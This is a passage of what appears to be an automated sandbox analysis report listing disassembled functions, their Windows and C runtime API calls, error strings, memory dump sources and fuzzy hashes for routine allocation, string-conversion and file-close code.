Opcode Fuzzy Hash: e51ed71a1184e0be453004719148579e0cf7ea03b994c715d1ac3cde1f9619a6
Instruction Fuzzy Hash: 4931F8B2A0CA818AF7324F22A4407797AAAEF857E4F244175EA8D477F5DB7CD541CB00

Function 00007FFE1330E8E0 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FFE1330E95B
IsDBCSLeadByteEx.KERNEL32 ref: 00007FFE1330E976
MultiByteToWideChar.KERNEL32 ref: 00007FFE1330E9CA
_errno.MSVCRT ref: 00007FFE1330E9D4

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Byte$CharMultiWide$Lead_errno
String ID:
API String ID: 2766522060-0
Opcode ID: a871b509cd8551db4e03bbfc493d5aa71d0119820ce4453e9fe1b48a24f38926
Instruction ID: a5f92e839e24eca710ed5c3755335b157961e2cb12cddafa9785068a4d2d77cf
Opcode Fuzzy Hash: a871b509cd8551db4e03bbfc493d5aa71d0119820ce4453e9fe1b48a24f38926
Instruction Fuzzy Hash: CE31C472B0CE828EF7B04F22A40037D6A90BBA57A4F044175EAEC637E5DB3CD4458719

Function 00007FFE1150126B Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 00007FFE11512330
_unlock.MSVCRT ref: 00007FFE11512357
realloc.MSVCRT ref: 00007FFE11512390
_unlock.MSVCRT ref: 00007FFE115123B8

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: _unlock$_lockrealloc
String ID:
API String ID: 4047297157-0
Opcode ID: afaa89eb9a781e74ef3867d866e68d3e9eb0bc36328b9edcdded064e7ff3b20a
Instruction ID: c5775a7bcaddacfeaa0c5e6a023598c27005c0d38ae8480cf0fd226920571b67
Opcode Fuzzy Hash: afaa89eb9a781e74ef3867d866e68d3e9eb0bc36328b9edcdded064e7ff3b20a
Instruction Fuzzy Hash: 26116DA2A05F4185EB475B22D8503BD229AAF44BE4F288174DA4D0B3E9EF3CE8958310

Function 00007FFE1330126B Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 00007FFE1330E7E0
_unlock.MSVCRT ref: 00007FFE1330E807
realloc.MSVCRT ref: 00007FFE1330E840
_unlock.MSVCRT ref: 00007FFE1330E868

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: _unlock$_lockrealloc
String ID:
API String ID: 4047297157-0
Opcode ID: 457591d8302be84774bad6e7394aed3a9deb09f1d721730b27b08a00734e280f
Instruction ID: 967e38dc0aab9b21ea3079edcbb0f7f9e1cb7df2ea105c215584a82373cfa94e
Opcode Fuzzy Hash: 457591d8302be84774bad6e7394aed3a9deb09f1d721730b27b08a00734e280f
Instruction Fuzzy Hash: 0011E262B0AF0188FB456F22E8503BC2295EF64FA4F08C570DA6D1B3D5EE3CE8518364

Function 00007FFE11508DD4 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE11508DEB
HeapAlloc.KERNEL32 ref: 00007FFE11508DFC

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11508E2B
mem_alloc, xrefs: 00007FFE11508E24

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$AllocProcess
String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
API String ID: 1617791916-3920367287
Opcode ID: 8df1f24abc851b79ec92a57fabfe05ed8a9e094508eb1567fe60d01fe4915a01
Instruction ID: 8dd4c622e117e7dafb6e9ced01be1e3e8a8c6582806aab78603818e571cb894f
Opcode Fuzzy Hash: 8df1f24abc851b79ec92a57fabfe05ed8a9e094508eb1567fe60d01fe4915a01
Instruction Fuzzy Hash: 51018651F4AE4789FB615B9B9840679164A6F84BE1F5C40B8CD0D073B5EE2CB9454200

Function 00007FFE1150619D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 06cd66b944d3a9319e3218b434eb9b47900b32e5ee9dd0b57d8b74fbf90c0a13
Instruction ID: f74da38735d695df0fa7f797b19d8b08c559f478d00dc123c03869bb633a1d0f
Opcode Fuzzy Hash: 06cd66b944d3a9319e3218b434eb9b47900b32e5ee9dd0b57d8b74fbf90c0a13
Instruction Fuzzy Hash: 71F0E253B08E0741FB139A46B8403BD224A2F413B4E6905B9CD090B2F2EE3DAC83C220

Function 00007FFE11506196 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 033238ed9175e08685e853d76087e5a60c74730473e37325a77fd666deea56be
Instruction ID: defa58e85b5ed61bfb4a90c0802fc85199a3931ce0e5bd1b87b676f17361833e
Opcode Fuzzy Hash: 033238ed9175e08685e853d76087e5a60c74730473e37325a77fd666deea56be
Instruction Fuzzy Hash: C7F08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD5D0B6F5EE3DAC87C220

Function 00007FFE115061B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: b1e857a3999b33b170259fa192d7dbe1d7372b98f6c06e000dbe99d88e484c62
Instruction ID: 979e4d9a53ac6481427d52e76c72ce4ae0a1a6b7c7b6a25f7c9ddf34878b7dea
Opcode Fuzzy Hash: b1e857a3999b33b170259fa192d7dbe1d7372b98f6c06e000dbe99d88e484c62
Instruction Fuzzy Hash: 70F0E253B08E0341FB139A86B8403BD224A2F413B4E6904B9CD090B6F1EE3DAC83C220

Function 00007FFE115061AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ee052a5866863e0b9580393c0c831830d4aea63d19b33e7002ba1fa6b3f918a8
Instruction ID: db439739b9188074c73f3163a66e9b4eaf4243eb0092e1113e71940c4be8e2c1
Opcode Fuzzy Hash: ee052a5866863e0b9580393c0c831830d4aea63d19b33e7002ba1fa6b3f918a8
Instruction Fuzzy Hash: 2BF08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD5D0B6F5EE3DAC87C220

Function 00007FFE115061A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 8688466a7ff7be1a657261c91ed8f130cb98350b75de14d50a5770a6db4e688a
Instruction ID: 4a93de2567861d3842d79e2b7536ef68b627affe69d1718176d6ef2d5408cb78
Opcode Fuzzy Hash: 8688466a7ff7be1a657261c91ed8f130cb98350b75de14d50a5770a6db4e688a
Instruction Fuzzy Hash: 9DF08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD590B6F6EE3DAC87C220

Function 00007FFE1150615D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 033238ed9175e08685e853d76087e5a60c74730473e37325a77fd666deea56be
Instruction ID: defa58e85b5ed61bfb4a90c0802fc85199a3931ce0e5bd1b87b676f17361833e
Opcode Fuzzy Hash: 033238ed9175e08685e853d76087e5a60c74730473e37325a77fd666deea56be
Instruction Fuzzy Hash: C7F08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD5D0B6F5EE3DAC87C220

Function 00007FFE11506179 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: b1e857a3999b33b170259fa192d7dbe1d7372b98f6c06e000dbe99d88e484c62
Instruction ID: 979e4d9a53ac6481427d52e76c72ce4ae0a1a6b7c7b6a25f7c9ddf34878b7dea
Opcode Fuzzy Hash: b1e857a3999b33b170259fa192d7dbe1d7372b98f6c06e000dbe99d88e484c62
Instruction Fuzzy Hash: 70F0E253B08E0341FB139A86B8403BD224A2F413B4E6904B9CD090B6F1EE3DAC83C220

Function 00007FFE11506172 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ee052a5866863e0b9580393c0c831830d4aea63d19b33e7002ba1fa6b3f918a8
Instruction ID: db439739b9188074c73f3163a66e9b4eaf4243eb0092e1113e71940c4be8e2c1
Opcode Fuzzy Hash: ee052a5866863e0b9580393c0c831830d4aea63d19b33e7002ba1fa6b3f918a8
Instruction Fuzzy Hash: 2BF08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD5D0B6F5EE3DAC87C220

Function 00007FFE1150616B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 8688466a7ff7be1a657261c91ed8f130cb98350b75de14d50a5770a6db4e688a
Instruction ID: 4a93de2567861d3842d79e2b7536ef68b627affe69d1718176d6ef2d5408cb78
Opcode Fuzzy Hash: 8688466a7ff7be1a657261c91ed8f130cb98350b75de14d50a5770a6db4e688a
Instruction Fuzzy Hash: 9DF08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD590B6F6EE3DAC87C220

Function 00007FFE11506164 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 06cd66b944d3a9319e3218b434eb9b47900b32e5ee9dd0b57d8b74fbf90c0a13
Instruction ID: f74da38735d695df0fa7f797b19d8b08c559f478d00dc123c03869bb633a1d0f
Opcode Fuzzy Hash: 06cd66b944d3a9319e3218b434eb9b47900b32e5ee9dd0b57d8b74fbf90c0a13
Instruction Fuzzy Hash: 71F0E253B08E0741FB139A46B8403BD224A2F413B4E6905B9CD090B2F2EE3DAC83C220

Function 00007FFE115062B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 891a2645fa3a214443c6745bbb264d24d59a494fae9dd5092461ba76f753e83c
Instruction ID: e14b2eb0e8aa9ec304f687a9427cb607a9163039d405500ca7e49d111f12fcf9
Opcode Fuzzy Hash: 891a2645fa3a214443c6745bbb264d24d59a494fae9dd5092461ba76f753e83c
Instruction Fuzzy Hash: FFF0BE53B08E0741FB139A46B8403BD224A2F413B4E6905B9CD090B6F2EE3DAC828220

Function 00007FFE115062AD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f290af3adf19bc87954ef24740a84b0980bee8df0861315649091d8159a92313
Instruction ID: 3eda3cb2489d0b03136e9ca7c8a4fd845145f92d8864729f821939f1ac7e418a
Opcode Fuzzy Hash: f290af3adf19bc87954ef24740a84b0980bee8df0861315649091d8159a92313
Instruction Fuzzy Hash: 39F0BE53B08D0341FB139A46B8403BD224A2F413B4E6904B9CD0C0B6F1EE3DA8828220

Function 00007FFE115062C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE115061D5

Strings

fs_file_read, xrefs: 00007FFE11506212
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11506219

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

